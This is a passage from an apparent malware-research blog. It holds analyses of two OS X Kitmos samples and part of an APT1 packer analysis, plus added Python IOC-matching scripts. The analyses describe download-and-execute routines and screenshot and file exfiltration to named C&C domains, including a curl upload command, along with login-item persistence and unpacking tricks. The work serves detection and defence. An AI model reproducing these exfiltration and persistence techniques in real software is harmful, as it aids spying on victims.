And the answer is:<br />
<br />
<script src="https://gist.github.com/steeve85/ccf267f547b0416ba61a.js"></script>
</div>
<div>
So Lenovo applications and firmware update over HTTP. Come on guys, we are in 2015!<br />
<br />
NB: Tests have been done on the YT2-830F_USR_S000143_1501051826_WW21_ROW firmware. A few days after I notified the Lenovo security team, they published a new firmware (YT2-830F_USR_S000184_1503241129_WW21_ROW) which does not fix that issue... </div>
<br />
<h2>
OSX Kitmos : other binary, other C&C</h2>
Published May 24th 2013<br />
On May 20th, Norman published a <a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">report</a> about an Indian cyberattack infrastructure that they call "Hangover", based on information found in the path of a PDB file.<br />
Their blog <a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">post</a> also refers to the Oslo Freedom Forum attack that I wrote about in my previous <a class="vt-p" href="http://blog.sbarbeau.fr/2013/05/osx-kitmos-analysis.html">article</a>:<br />
"<i>Based on the sample and Command&Control domain mentioned in the F-Secure post, we can say quite conclusively that the Oslo Freedom Forum attack was performed through the same attack infrastructure. We also found another MachO executable apparently written by the same person (same Apple Developer ID), and using another domain in the Hangover infrastructure – torqspot.org.</i>"<br />
<br />
As this domain was present in another Mach-O binary that I have, I chose to take a quick look at it.<br />
<br />
<br />
<br />
<h2>
File information</h2>
SHA1 hash : b6a47d52de64af50a5a1415213e60dc1b076b4e7<br />
File type : Mach-O executable i386<br />
VirusTotal report : https://www.virustotal.com/en/file/a74196018b2854765333a8f798b0ae3f3b71c89ec9632188f07c71d055125cb2/analysis/<br />
<br />
<h2>
C&C information</h2>
This sample uses "torqspot.org" as its C&C domain name. Whois again reveals fake information:<br />
<br />
Domain ID:D168171472-LROR<br />
Domain Name:TORQSPOT.ORG<br />
Created On:16-Mar-2013 05:28:07 UTC<br />
Last Updated On:16-May-2013 03:45:16 UTC<br />
Expiration Date:16-Mar-2014 05:28:07 UTC<br />
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)<br />
Status:CLIENT TRANSFER PROHIBITED<br />
Registrant ID:DI_25590875<br />
Registrant Name:Melissa Leo<br />
Registrant Street1:E-5 cecill street<br />
Registrant Street2:Manchester<br />
Registrant City:Manchester<br />
Registrant State/Province:Manchester(Cityof)<br />
Registrant Postal Code:M14LF<br />
Registrant Country:GB<br />
Registrant Phone:+044.7251868<br />
Registrant Email:leo.melissa@mail.ru<br />
<br />
The C&C is no longer responding.<br />
<h2>
IOC</h2>
All logged messages can be used to identify a compromised Macintosh. For example, the following messages can be used as IOCs:<br />
<br />
- "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@"<br />
- "CONTACTS mreslt %@"<br />
- "CONTACTS urlResponse %d"<br />
- "responseData: %@"<br />
- "http://torqspot.org/App/MacADV/$hostname/$serverResponse"<br />
- "/Applications"<br />
- "End"<br />
- "app path =%@"<br />
- " exec path =%@"<br />
- "file: %@"<br />
- "connected to upload server %@"<br />
- "Fail connected to upload server %@, begin in %d sec"<br />
- "Try zip and upload for failed file, before."<br />
- "ComputerName_UserName : %@"<br />
- "Failed retry %@"<br />
- "Retry %@"<br />
- "New seesion"<br />
- "search path from state.dat"<br />
- "search path from root"<br />
- "available paths: %@"<br />
- "No found folder"<br />
- "No found file"<br />
- "Start searching"<br />
- "%ld files found"<br />
<br />
DNS resolution of "torqspot.org" and any kind of HTTP request to this domain can also be used to identify a compromised computer on a network.<br />
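To put these IOCs to work, the following Python example (added here, not part of the original post) turns the NSLog-style format strings listed above into regular expressions so that rendered log lines match them, checks the output of the strings command on a suspect binary for the raw format strings, and flags DNS or HTTP log lines that reference the C&C domain (including subdomains, but not look-alike names that merely contain it). The console and DNS log lines it runs over are constructed for the example.

```python
import re

# Format strings copied verbatim from the IOC list in the post (a representative subset).
KITMOS_FORMAT_STRINGS = [
    "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@",
    "CONTACTS mreslt %@",
    "CONTACTS urlResponse %d",
    "connected to upload server %@",
    "Fail connected to upload server %@, begin in %d sec",
    "Try zip and upload for failed file, before.",
    "ComputerName_UserName : %@",
    "New seesion",
    "search path from state.dat",
    "%ld files found",
]
C2_DOMAIN = "torqspot.org"

# Constructed sample lines in the style of Console.app / syslog and of a BIND query log.
SAMPLE_CONSOLE_LOG = [
    "May 21 10:02:11 macbook Finder[201]: opened folder",
    "May 21 10:02:14 macbook Preferences[4421]: connected to upload server torqspot.org",
    "May 21 10:02:20 macbook Preferences[4421]: 37 files found",
    "May 21 10:02:21 macbook Preferences[4421]: Fail connected to upload server torqspot.org, begin in 60 sec",
]
SAMPLE_DNS_LOG = [
    "21-May-2013 10:02:13 client 10.0.0.12#51234: query: torqspot.org IN A",
    "21-May-2013 10:02:13 client 10.0.0.12#51234: query: www.apple.com IN A",
    "21-May-2013 10:02:15 client 10.0.0.12#51234: query: notorqspot.org IN A",
]


def format_string_to_regex(fmt):
    """Compile an NSLog-style format string into a regex matching its rendered output:
    %@ and %s become a lazy wildcard, %d and %ld an integer, everything else is literal."""
    pattern = ""
    for token in re.split(r"(%(?:ld|@|d|s))", fmt):
        if token in ("%@", "%s"):
            pattern += ".*?"
        elif token in ("%d", "%ld"):
            pattern += r"-?\d+"
        else:
            pattern += re.escape(token)
    return re.compile(pattern)


# Longest format string first, so "Fail connected to upload server ..." wins over the
# shorter "connected to upload server ..." that it contains.
IOC_PATTERNS = sorted(((fmt, format_string_to_regex(fmt)) for fmt in KITMOS_FORMAT_STRINGS),
                      key=lambda p: -len(p[0]))


def match_log_lines(lines):
    """Return (line, format string) pairs for lines that look like rendered Kitmos log output."""
    hits = []
    for line in lines:
        for fmt, rx in IOC_PATTERNS:
            if rx.search(line):
                hits.append((line, fmt))
                break
    return hits


def match_binary_strings(lines):
    """For `strings` output of a suspect Mach-O: exact occurrences of the raw format strings."""
    wanted = set(KITMOS_FORMAT_STRINGS)
    return [line for line in lines if line.strip() in wanted]


def match_network_lines(lines):
    """Flag DNS or HTTP log lines naming the C&C domain or one of its subdomains."""
    rx = re.compile(r"(^|[\s/.@])" + re.escape(C2_DOMAIN) + r"($|[\s/:])", re.IGNORECASE)
    return [line for line in lines if rx.search(line)]


if __name__ == "__main__":
    for line, fmt in match_log_lines(SAMPLE_CONSOLE_LOG):
        print("LOG   ", fmt, "<-", line)
    for line in match_network_lines(SAMPLE_DNS_LOG):
        print("DNS   ", line)
```

The domain regex deliberately requires a delimiter on both sides of the name: "notorqspot.org" in the sample DNS log is not flagged, while "www.torqspot.org" or "http://torqspot.org/App/MacADV/..." would be.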
<h2>
Features</h2>
Lots of features and functions (coml, cop, runSystemCommand, ...) are similar to the previously <a class="vt-p" href="http://blog.sbarbeau.fr/2013/05/osx-kitmos-analysis.html">analyzed binary</a>. Below, only the new and interesting ones are detailed.<br />
<br />
<h3>
macurl</h3>
- send synchronous HTTP request to "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@" w/ hostname as 1st arg and "no" as 2nd arg<br />
- get data at URL "http://torqspot.org/App/MacADV/$hostname/$serverResponse" w/ dataWithContentsOfURL function, where $serverResponse is the response sent by the server to the previous request<br />
- write downloaded data to file "/Applications/$ServerResponse"<br />
- execute the following command:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"/usr/bin/<a class="vt-p" href="http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/ditto.1.html">ditto</a> -x -k /Applications/$ServerResponse /Applications/" to extract PKZip archive "/Applications/$ServerResponse" to "/Applications/"<br />
- replace/add ".app" extension to "/Applications/$ServerResponse"<br />
- if path exists, run the executable (NSTask, setLaunchPath, launch)<br />
- create string "http://torqspot.org/App/MacDV/up.php?cname=%@&file=%@&res=%@" w/ arguments : $hostname, $serverResponse and "sucess" (w/ one 'c' :)<br />
- send a request using that string (w/ sendSynchronousRequest:returningResponse:error: method)<br />
- log "file: %@" w/ data answered by the server as argument<br />
<br />
<h3>
initFileBackup</h3>
- get bundlePath and add "FileBackup.ini" to it<br />
- use "stringWithContentsOfFile:encoding:error:" function to get content data of config file ("<bundlePath>/FileBackup.ini")<br />
- if the file content is less than 10 characters, go to the end of the function<br />
- extract data between <URL> and </URL> to pass as parameter to setUrl function<br />
- extract data between <EXTENSION> and <EXTENSION> and use it to create an array of strings based on ';' separator<br />
- call setExtArray to initialize an array with extensions stored in "FileBackup.ini" file<br />
<br />
<h3>
before_start_</h3>
- get bundlePath and add "state.dat" to it<br />
- if that file exists, read its content and create an array of strings by splitting on the "#####" separator. Then use the strings in that array as paths<br />
- if the file doesn't exist, path will be set to "/"<br />
- call connectServer/upload of ZipUpload class and run a command similar to this : "/usr/bin/curl -F upload=@ -F pc="<br />
<br />
<h3>
find_</h3>
Looking for files based on extension<br />
<br />
<h3>
batch_</h3>
Do some stuff and call macurl<br />
<br />
<h3>
deleteState_</h3>
Delete file "<bundlePath>/state.dat" if it exists<br />
<br />
<h3>
saveState_</h3>
Save a string array to "<bundlePath>/state.dat", separating the strings with "#####". This function is called by the find function, after which the malware terminates.<br />
<br />
<br />
<h2>
Refs</h2>
<a class="vt-p" href="https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc">https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc</a><br />
<a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">http://www.f-secure.com/weblog/archives/00002554.html</a><br />
<a class="vt-p" href="http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/">http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/</a><br />
<a class="vt-p" href="http://blogs.norman.com/2013/security-research/the-hangover-report">http://blogs.norman.com/2013/security-research/the-hangover-report</a><br />
<a class="vt-p" href="https://www.botnets.fr/index.php/HangOver">https://www.botnets.fr/index.php/HangOver</a><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>
<h2>
OSX Kitmos analysis</h2>
Posted by Steeve Barbeau on 2013-05-20 (last updated 2013-05-24).<br />
On 16 May, <a class="vt-p" href="https://twitter.com/5ean5ullivan">Sean Sullivan</a> published an <a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">article</a> on the F-Secure blog about a new Mac OS X malware discovered by <a class="vt-p" href="https://twitter.com/ioerror">Jacob Appelbaum</a> on the Mac of an African activist during an Oslo Freedom Forum workshop.<br />
<br />
<h2>
File information</h2>
SHA1 hash : 4395a2da164e09721700815ea3f816cddb9d676e<br />
<br />
According to the Unix file command, this binary is a Mach-O executable containing both x86 and x64 code. The VirusTotal report of this binary can be found <a class="vt-p" href="https://www.virustotal.com/ru/file/6acd92d0dfe3e298d73b78a3dcc6d52ff4f85a70a9f2d0dcfe7ae4af2dd685cc/analysis/">here</a>. Even a very quick look at the sample shows that it is not packed, obfuscated or encrypted.<br />
<br />
<h2>
C&C information</h2>
This sample contains two C&C URLs which, at the moment, both point to the same server at IP 50.116.28.24 (this differs from the F-Secure blog post, where the IP addresses of the two domains were different). This IP address belongs to the Linode hosting company.<br />
<br />
A whois on "securitytable.org" reveals this (fake) information :<br />
<br />
Domain ID:D168053198-LROR<br />
Domain Name:SECURITYTABLE.ORG<br />
Created On:04-Mar-2013 06:58:36 UTC<br />
Last Updated On:16-May-2013 16:02:07 UTC<br />
Expiration Date:04-Mar-2014 06:58:36 UTC<br />
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)<br />
Status:CLIENT TRANSFER PROHIBITED<br />
Registrant ID:DI_26714386<br />
Registrant Name:Christopher<br />
Registrant Organization:N/A<br />
Registrant Street1:DE-10387<br />
Registrant Street2:Nairobi<br />
Registrant Street3:<br />
Registrant City:Nairobi<br />
Registrant State/Province:Central<br />
Registrant Postal Code:50563<br />
Registrant Country:KE<br />
Registrant Phone:+254.204973957<br />
Registrant Phone Ext.:<br />
Registrant FAX:<br />
Registrant FAX Ext.:<br />
Registrant Email:n.christopher@mail.ru<br />
<br />
The whois information of the "docsforum.info" domain is similar.<br />
<br />
<h2>
IOC</h2>
All logged messages can be used to identify a compromised Macintosh. For example, the following messages can be used as IOCs :<br />
- " before ==%@"<br />
- "path == %@"<br />
- "path2===%@"<br />
- "Hellooo"<br />
- "Copy successful"<br />
- "Upload response %@"<br />
- "the path =%@"<br />
- "path1 =%@"<br />
- " Error - Statistics file upload failed: "%@""<br />
- " the array value =%@"<br />
- path to $HOME/MacApp<br />
- date in this format : "yy-MM-dd-HH:mm:ss"<br />
- ComputerName_UserName : "$hostname-$username"<br />
- "Start file zip : %@"<br />
- "Start file upload : %@"<br />
- "finished zipping file"<br />
- "finished uploading file"<br />
- "file path==%@"<br />
<br />
Network traffic can also be used to identify a compromised Mac on your network. A compromised Macintosh generates DNS requests for the "securitytable.org" and "docsforum.info" domains which, at the time I'm writing this blog post, resolve to 50.116.28.24. HTTP requests to "http://securitytable.org/lang.php" and "http://docsforum.info/lang.php" also reveal the compromise.<br />
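The IOCs listed above can be turned into a host check. The following Python script is an added example, not code from the original post or from the malware: it converts the NSLog format strings into patterns, validates file names in $HOME/MacApp against the "yy-MM-dd-HH:mm:ss.png" scheme and flags the two C&C domains. The sample log lines, directory listing and DNS queries are constructed.<br />

```python
import re
from datetime import datetime

# Log format strings listed in the IOC section; "%@" is NSLog's object placeholder.
KITMOS_LOG_FORMATS = [
    " before ==%@",
    "path == %@",
    "path2===%@",
    "Hellooo",
    "Copy successful",
    "Upload response %@",
    "the path =%@",
    "path1 =%@",
    ' Error - Statistics file upload failed: "%@"',
    " the array value =%@",
    "Start file zip : %@",
    "Start file upload : %@",
    "finished zipping file",
    "finished uploading file",
    "file path==%@",
]

# Screenshot names follow the NSDateFormatter pattern "yy-MM-dd-HH:mm:ss" plus ".png".
SCREENSHOT_NAME = re.compile(r"^\d{2}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.png$")

# C&C domains named in the post (both resolved to 50.116.28.24 at analysis time).
KITMOS_DOMAINS = {"securitytable.org", "docsforum.info"}


def _format_to_regex(fmt):
    """Turn an NSLog format string into a regex: literal text, "%@" matches anything.

    Only anchored at the end, so a syslog/ASL prefix may precede the message."""
    return re.compile(".*?".join(re.escape(p) for p in fmt.split("%@")) + "$")


_LOG_PATTERNS = [(fmt, _format_to_regex(fmt)) for fmt in KITMOS_LOG_FORMATS]


def match_log_line(line):
    """Return the Kitmos format string a log line matches, or None."""
    for fmt, pat in _LOG_PATTERNS:
        if pat.search(line):
            return fmt
    return None


def is_screenshot_name(name):
    """True if a file name uses the malware's naming scheme and holds a valid date."""
    if not SCREENSHOT_NAME.match(name):
        return False
    try:
        datetime.strptime(name[:-4], "%y-%m-%d-%H:%M:%S")
    except ValueError:
        return False
    return True


def scan_host_artifacts(log_lines, macapp_listing, dns_queries):
    """Combine the three IOC classes: log strings, $HOME/MacApp files, DNS names."""
    hits = {
        "log": [l for l in log_lines if match_log_line(l)],
        "screenshots": [f for f in macapp_listing if is_screenshot_name(f)],
        "dns": [d for d in dns_queries if d.lower().rstrip(".") in KITMOS_DOMAINS],
    }
    hits["compromised"] = any(hits[k] for k in ("log", "screenshots", "dns"))
    return hits


# Constructed sample input (not taken from a real infected host).
SAMPLE_LOG = [
    "May 16 10:21:03 mac MacApp[412]: path == /Users/alice/MacApp",
    "May 16 10:21:03 mac MacApp[412]: Start file upload : /Users/alice/MacApp/13-05-16-10:20:43.png",
    "May 16 10:21:05 mac kernel[0]: en0: link up",
]
SAMPLE_LISTING = [".DS_Store", "13-05-16-10:20:43.png", "notes.txt", "99-99-99-99:99:99.png"]
SAMPLE_DNS = ["time.apple.com", "securitytable.org."]

if __name__ == "__main__":
    print(scan_host_artifacts(SAMPLE_LOG, SAMPLE_LISTING, SAMPLE_DNS))
```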
<br />
<h2>
Features</h2>
<h3>
sub_1E72</h3>
The function "sub_1E72" is responsible for the persistence of this malware: it adds the malware to the list of items started at session login.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ea-4z6d17ir8Cn5FdPscqkocKJq2pw0cgvslsfpOvIodwSEYTwX9nW7n_vZX8PV0Kgn9Rb1fYUJwn-g6h1Y1mF9FfOTb13m-mvQV87nDbimlUkSO5JbKhQOOelpW4x9HeP6kObxC3gJ-/s1600/start_at_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ea-4z6d17ir8Cn5FdPscqkocKJq2pw0cgvslsfpOvIodwSEYTwX9nW7n_vZX8PV0Kgn9Rb1fYUJwn-g6h1Y1mF9FfOTb13m-mvQV87nDbimlUkSO5JbKhQOOelpW4x9HeP6kObxC3gJ-/s640/start_at_login.png" width="640" /></a></div>
<br />
<br />
<br />
- get the malware bundle path thanks to NSBundle.bundlePath<br />
- call LSSharedFileListCreate with kLSSharedFileListSessionLoginItems as ListType in order to access the list of applications started when the user logs on<br />
- call LSSharedFileListInsertItemURL to add the path of the malware bundle to that list<br />
<br />
PS : The malware is added to the login items of the current user only; if the malware author wanted his program to start for all users on the system, he would have to pass the kLSSharedFileListGlobalLoginItems list type to LSSharedFileListCreate.<br />
<br />
More information about this technique can be found here : <a class="vt-p" href="http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/">http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/</a><br />
<br />
<h3>
cop</h3>
The first time the binary is executed, it copies itself to $HOME/&lt;bundle_name&gt;.app. Then the sample calls the "coml" function with the path of the new location (or of its current location, if this is not the first execution) as parameter.<br />
<br />
The call to "coml" results in the execution of the following command : "/bin/sh -c open -a $HOME/&lt;bundle_name&gt;.app" (see coml & runSystemCommand below)<br />
<br />
<h3>
coml</h3>
Prepare "open -a $arg" NSString for "runSystemCommand" function.<br />
<br />
<h3>
runSystemCommand</h3>
Execute "/bin/sh -c $arg".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilB0YHLCgF5vA3volxHArUQepkzoolxTx7UConlIpXCw_d-4KG92ysJxsA7hMdwfhXFcq8iPxCLxZvzQBGCgqpEXC-G-6LgpetjsYpIooe1mkbmmiRYXPf3f5JGNdGCQ0dj8OVaaYCqy9R/s1600/run_cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilB0YHLCgF5vA3volxHArUQepkzoolxTx7UConlIpXCw_d-4KG92ysJxsA7hMdwfhXFcq8iPxCLxZvzQBGCgqpEXC-G-6LgpetjsYpIooe1mkbmmiRYXPf3f5JGNdGCQ0dj8OVaaYCqy9R/s640/run_cmd.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
- create an NSArray via the arrayWithObjects method, used as the command line arguments for "sh", containing "-c" and the runSystemCommand argument<br />
- create an NSTask and call the launchedTaskWithLaunchPath:arguments: method with "/bin/sh" and the previous NSArray as arguments<br />
<br />
<h3>
uploadRequestFinished</h3>
This function logs some information, like the response string received from the server and the path of the uploaded file. Then the uploaded file is removed from the file system with a call to removeItemAtPath.<br />
<br />
<h3>
uploadRequestFailed</h3>
Log " Error - Statistics file upload failed: "%@"" where %@ is replaced by localizedDescription returned string.<br />
<br />
<h3>
sendRequestToServer</h3>
This function sends the hostname of the compromised Macintosh to the C&C server via an HTTP request to the http://docsforum.info/lang.php URL.<br />
<br />
- create "http://docsforum.info/lang.php" URL for ASIFormDataRequest<br />
- get hostname via NSProcessInfo.processInfo.hostName<br />
- call stringByReplacingOccurrencesOfString on hostname value to replace '.' by 'p'<br />
- log that new "hostname" string<br />
- add hostname value to the HTTP request as a POST data named "cname" (addPostValue function)<br />
- do the request w/ startAsynchronous<br />
<br />
NB : I don't know if this function is called anywhere, as I haven't found any xref to it<br />
<br />
<h3>
getscreenshot</h3>
This function takes screenshots with the screencapture Mac OS X binary and saves them in the $HOME/MacApp directory. Screenshot names follow this format : "yy-MM-dd-HH:mm:ss.png". This function is first called from the applicationDidFinishLaunching function. Screenshots are saved every 20 seconds.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8wRLArVECuoZhJNqwqPViNbzv2DBiBQEIurVEUehqWdqXsyZuZLCIvogVe0FiqtuVg1ETUsqk_yhGbE5b6_oQHzl4CsDyeMK92ja6v-Yqp1Z5ue_CzLwT-XGf4k4Ty7CyGN9iTaD41DwX/s1600/takescreenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8wRLArVECuoZhJNqwqPViNbzv2DBiBQEIurVEUehqWdqXsyZuZLCIvogVe0FiqtuVg1ETUsqk_yhGbE5b6_oQHzl4CsDyeMK92ja6v-Yqp1Z5ue_CzLwT-XGf4k4Ty7CyGN9iTaD41DwX/s640/takescreenshot.png" width="640" /></a></div>
<br />
<br />
- create the $HOME/MacApp path (with the NSHomeDirectory and stringWithFormat functions)<br />
- this path is logged to the Apple System Log via NSLog<br />
- use the shared file manager to work with the file system (via NSFileManager.defaultManager)<br />
- check if the path exists (via fileExistsAtPath)<br />
- if it doesn't exist, create the directory with createDirectoryAtPath<br />
- get a date string in the format "yy-MM-dd-HH:mm:ss" (via NSDate, NSDateFormatter, setDateFormat, stringFromDate). Note that this date format differs from the F-Secure screenshot: ':' is used here where the F-Secure screenshot shows '/'<br />
- the date is logged (NSLog)<br />
- create the string $HOME/MacApp/yy-MM-dd-HH:mm:ss.png<br />
- create an NSTask object to run a program as a subprocess<br />
- set the executable path to "<a class="vt-p" href="http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/screencapture.1.html">/usr/sbin/screencapture</a>" via setLaunchPath<br />
- pass the arguments to screencapture via setArguments :<br />
/usr/sbin/screencapture -x -T 20 $HOME/MacApp/yy-MM-dd-HH:mm:ss.png : take a screenshot without any sound after a 20 second delay and save it to the aforementioned path<br />
- the task is launched via the launch method<br />
- finally, the uploadImage function is called<br />
<br />
<h3>
uploadImage</h3>
This function uploads the screenshots to "http://securitytable.org/lang.php"<br />
<br />
- create an NSURL object with the string "http://securitytable.org/lang.php" and use it to create an ASIFormDataRequest<br />
- create the MacApp directory path string and log it (like in the getscreenshot function)<br />
- get the hostname of the computer, thanks to the "hostname" method of the NSProcessInfo object (the process information agent of the process)<br />
- check that the path to the MacApp folder exists; go to the end of the function if not<br />
- count the number of files/screenshots with contentsOfDirectoryAtPath and the count method on the returned string array<br />
- log the number of files/screenshots<br />
- get the first file of the list<br />
- log " the array value =%@" where %@ is replaced by the name of the first file<br />
- if ".DS_Store" is present, remove it from the file array<br />
- loop over the remaining files/screenshots to upload each one :<br />
- create an NSData object with the content of the file/screenshot (via initWithContentsOfFile)<br />
- call ASIFormDataRequest.addPostValue to set the $hostname value for the key "cname"<br />
- second call to addPostValue with the key "name" and, as value, the path to the screenshot<br />
- then call setData ("setData:withFileName:andContentType:forKey:") with :<br />
key : userfile<br />
content type : image/png<br />
filename : path to the screenshot<br />
data : file content (screenshot)<br />
- upload the file/screenshot<br />
- call the getscreenshot function<br />
<br />
<h2>
Summary</h2>
This Mac OS X malware is really simple. It has only a few features :<br />
- start at user login<br />
- take screenshot<br />
- upload screenshot<br />
<br />
In addition, it is absolutely not stealthy, as the screenshots are saved in the $HOME/MacApp directory of the infected user. No advanced malware techniques/features (packing, encryption, obfuscation) were seen in this sample.<br />
<br />
<h2>
Refs</h2>
<a class="vt-p" href="https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc">https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc</a><br />
<a class="vt-p" href="http://www.f-secure.com/weblog/archives/00002554.html">http://www.f-secure.com/weblog/archives/00002554.html</a><br />
<a class="vt-p" href="http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/">http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/</a><br />
<div>
<a class="vt-p" href="https://www.botnets.fr/index.php/HangOver">https://www.botnets.fr/index.php/HangOver</a><br />
<br /></div>
<h2>
Analysis of an APT1 binary</h2>
Posted by Steeve Barbeau on 2013-04-01.<br />
<div style="text-align: justify;">
In the middle of February, Mandiant released a huge <a class="vt-p" href="http://intelreport.mandiant.com/" target="_blank">report</a> about the cyber threat from the Chinese government. Some of the technical details were disclosed in Appendix C ("The Malware Arsenal") of their report.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Because of this APT buzz, I decided to take a look at one of the binaries mentioned in the APT1 report in order to know the level of this cyber threat.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After running a script on around 200 samples from APT1, I decided to analyse the binary which looked the strangest. The VT report can be found <a class="vt-p" href="https://www.virustotal.com/fr/file/e688090626629f14ce10a5eba1e122ceb6bf4bb60e4a66664e337bb793bbc80e/analysis/" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_Z1HbQnSGKWZEmFOJV3H1rdNtDy_OIef_DskjEdBAIjUdxKcW1nD7hvTGJFPRqz3OeHJgzlcf3orDFMGZ9SCOVdL-5xDqNazgN4AhO6q76j6B0u85wTILoVpvCCkfa6DZGwGUQYpkBNO/s1600/peid.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_Z1HbQnSGKWZEmFOJV3H1rdNtDy_OIef_DskjEdBAIjUdxKcW1nD7hvTGJFPRqz3OeHJgzlcf3orDFMGZ9SCOVdL-5xDqNazgN4AhO6q76j6B0u85wTILoVpvCCkfa6DZGwGUQYpkBNO/s320/peid.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
According to PEiD, this binary is not packed, but it has 4 ".upx" sections and the OEP points to the last ".upx" section, which is not normal behaviour. The few functions in the import table, the few strings in the binary and the high entropy of all sections confirm that point: the binary is packed! I thought it interesting to take a look at this binary in order to understand, and maybe identify, the packer used, as PEiD failed to identify it.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Unpacking</h2>
<div style="text-align: justify;">
The beginning of the packed code (in the last .upx section : 0x8000) contains a lot of junk code. After these useless instructions, a loop modifies the code that follows it. The code after this loop is used to get the addresses of <i>LoadLibrary</i> and <i>GetProcAddress</i> thanks to the ImportTableAddress field of the loaded PE file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<i>LoadLibrary</i> is then used to load "<i>kernel32.dll</i>" and <i>GetProcAddress</i> to get the addresses of the following functions :</div>
<div style="text-align: justify;">
<i>GetModuleHandleA, VirtualProtect, GetModuleFileNameA, CreateFileA, GlobalAlloc, GlobalFree, ReadFile, GetFileSize, CloseHandle, CreateSemaphoreA, ReleaseSemaphore, Sleep, WaitForSingleObject, CreateThread</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the resolution of these functions, SizeOfImage in PEB->PEB_LDR_DATA->InLoadOrderModuleList is set to 1000 (the previous value was 9000). Then <i>VirtualProtect</i> is called in order to change the protection of the binary's ImageBase to PAGE_READWRITE.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then some strings are decoded in memory before being used, for example to load the "<i>kernel32.dll</i>" library again and then resolve the addresses of <i>VirtualProtect, VirtualAlloc, VirtualFree</i>. As soon as a string has been used by <i>LoadLibraryA</i> or <i>GetProcAddress</i>, it is overwritten with zeros in memory. With this kind of protection, the process holds little information in memory, so a dump of the process memory at this point is not very useful to an analyst.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then the code jumps to the third section (.upx at 0x7000), which does similar things. The same goes for the second .upx section.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first .upx section at RVA 0x5000 (but the last one called, as the order is reversed) does similar things to the previous sections, but as this is the last packed section, its actions are more interesting for the unpacked binary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In fact, this last .upx section loads all the DLLs used by the final (unpacked) binary and resolves the addresses of all its functions :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
kernel32.dll : <i>CreateProcess, GetLongPathNameA, GetTempPathA, Sleep, CloseHandle, GetModuleHandleA, GetCommandLineA, GetModuleFileNameA, GetProcAddress, LoadLibraryA, ExitProcess</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
LZ32.dll : <i>LZCopy, LZOpenFileA, LZClose</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
MSVCRT.dll : <i>strstr, strncmp, atoi ...</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ADVAPI32.dll : <i>RegSetValueExA, RegCreateKeyExA, RegCloseKey</i></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then the code jumps into the .text section, and the OEP is then correct.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This packer uses several tricks to annoy the disassembler/analyst, like jumps into the middle of an instruction, "push eax; retn", always-true comparisons... but nothing to detect the presence of a debugger or a VM.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
